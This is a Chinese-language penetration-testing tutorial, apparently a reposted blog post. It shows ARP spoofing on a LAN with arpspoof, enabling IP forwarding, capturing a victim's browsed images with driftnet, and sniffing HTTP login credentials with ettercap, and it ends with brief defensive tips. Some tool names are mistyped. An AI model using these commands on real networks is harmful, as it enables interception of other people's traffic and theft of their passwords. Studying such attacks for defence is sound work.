渗透测试-----ARP攻击
在kali中編輯vim文件
先進(jìn)入文件后按i即可編輯
在按esc退出編輯
要保存并退出按 :wq即可(如果這樣按了不行,就按 :wq!)
退出后輸入:sudo sysctl -p生效配置
ARP攻擊
只能在局域網(wǎng)中進(jìn)行,無(wú)法對(duì)外網(wǎng)進(jìn)行攻擊
原理:ARP攻擊就是通過(guò)偽造IP地址何MAC地址實(shí)現(xiàn)ARP欺騙,能夠在網(wǎng)絡(luò)中產(chǎn)生大量的ARP通信量使網(wǎng)絡(luò)阻塞,攻擊者只要持續(xù)不斷地發(fā)出偽造的ARP響應(yīng)包就能更改目標(biāo)主機(jī)ARP緩存中的IP-MAC條目,造成網(wǎng)絡(luò)中斷或中間人攻擊。
工具 簡(jiǎn)介 Arpspoof ARP欺騙的工具,可毒害受害者ARP緩存,將網(wǎng)關(guān)MAC替換為攻擊者M(jìn)AC Driftnet 圖片捕獲工具,用于監(jiān)聽(tīng)網(wǎng)絡(luò)流量并從它觀察到的TCP流中提取圖像的程序 Ettercap 網(wǎng)絡(luò)抓包工具,利用ARP協(xié)議的缺陷進(jìn)行中間人攻擊,嗅探局域網(wǎng)數(shù)據(jù)流量 |
Arpspoof
Arpspoof -i eth0 -t 192.168.0.106(目標(biāo)IP) 192.168.0.1(網(wǎng)關(guān)IP)
使用該命令后可以使得目標(biāo)ip斷網(wǎng)
設(shè)置端口轉(zhuǎn)發(fā)后不能直接對(duì)主機(jī)進(jìn)行斷網(wǎng),需要將修改的地方改回來(lái)即可
端口轉(zhuǎn)發(fā)(使受害者不斷網(wǎng)的同時(shí),對(duì)其流量數(shù)據(jù)進(jìn)行監(jiān)聽(tīng))
1、編輯kali linux虛擬機(jī)vim /etc/sysctl.conf配置文件,將net.ipv4.ip_forward配置項(xiàng)刪掉“#”注釋符號(hào),并將其值由0改為1即可開(kāi)啟端口轉(zhuǎn)發(fā):
這里的修改是開(kāi)啟路由轉(zhuǎn)發(fā)功能
2、接著在kali終端重新執(zhí)行arpspoof命令(注意網(wǎng)關(guān)ip和主機(jī)ip順序此時(shí)想要對(duì)換一下)
Arpspoof-i eth0 -t 192.168.0.1(網(wǎng)關(guān)ip)192.168.0.166(目標(biāo)ip) 只能抓取到請(qǐng)求到的圖片
重新對(duì)win 10主機(jī)發(fā)動(dòng)ARP欺騙攻擊,此時(shí)其仍能正常聯(lián)網(wǎng),端口轉(zhuǎn)發(fā)成功
既可以抓取到請(qǐng)求的圖片流,也可以抓取響應(yīng)的圖片流
Arpspoof -I eth0 -r 192.168.0.1 -t192.168.0.166
接下來(lái)就是攻擊演示
Briftnet是一款簡(jiǎn)單而使用的圖片捕獲工具,可以很方便的在網(wǎng)絡(luò)數(shù)據(jù)包中抓取到圖片,使用語(yǔ)法:
brftnet [options] [filter code]
選項(xiàng) | 描述 |
-b | 捕獲到新的圖片時(shí)發(fā)出嘟嘟聲 |
-i | inertface選擇監(jiān)聽(tīng)接口 |
-f | file讀取一個(gè)指定pcap數(shù)據(jù)包中的圖片 |
-p | 不讓所監(jiān)聽(tīng)的接口使用混雜模式 |
-a | 后臺(tái)模式:將捕獲的土拍你保存到目錄中(不會(huì)顯示在屏幕上) |
-m | number指定保存圖片數(shù)的數(shù)目 |
-d | directory指定保存圖片的路徑 |
-x | prefix指定保存圖片的前綴名 |
先對(duì)目標(biāo)主機(jī)進(jìn)行arp欺騙后
driftnet -i eht0 將會(huì)打開(kāi)一個(gè)監(jiān)聽(tīng)的窗口,只能實(shí)時(shí)監(jiān)聽(tīng)一些打開(kāi)的圖片,并不能保存
driftnet -i eth0 -a -d /root/hhh 該命令回將瀏覽的圖片保存到kali虛擬機(jī)的/root/hhh/路徑下
先對(duì)其進(jìn)行ARP攻擊才可進(jìn)行密碼監(jiān)聽(tīng)
Arpspoof -I eth0 -t 192.168.1.1(網(wǎng)關(guān)) 192.168.1.106(ip地址)
密碼監(jiān)聽(tīng)----ettercap(不用開(kāi)啟ip地址轉(zhuǎn)發(fā)功能,這里的密碼監(jiān)聽(tīng)只能監(jiān)聽(tīng)http協(xié)議的,不能監(jiān)聽(tīng)https的)
ettercap的參數(shù)及常用操作
選項(xiàng) | 描述 |
-l | 顯示可用網(wǎng)卡接口設(shè)備 |
-i | 選擇接口 |
-t | 協(xié)議選擇,tcp/udp/all,默認(rèn)為all |
-p | 不進(jìn)行毒化攻擊,用于嗅探本地?cái)?shù)據(jù)包 |
-L | 載入過(guò)濾文件 |
-V | Text將數(shù)據(jù)包以文本形式顯示在屏幕上 |
-L | Filename把所有的數(shù)據(jù)包保存下來(lái)(保存后的文件只能用etterlog顯示) |
在終端輸入命令
ettercap -Tq -ieth0 監(jiān)控eth0網(wǎng)卡的流量
此時(shí)在物理機(jī)輸入正確的賬號(hào)和密碼后,即可在虛擬機(jī)終端輸出打印其賬號(hào)密碼等登錄信息
如何防范ARP攻擊
定期刪除ARP緩存表
綁定靜態(tài)的ARP表
安裝ARP防火墻
拒絕連接安全性未知的Wifi
總結(jié)
以上是生活随笔為你收集整理的渗透测试-----ARP攻击的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 008--【SpringBoot】过滤器
- 下一篇: 「镁客·请讲」移康智能朱鹏程:做产品就要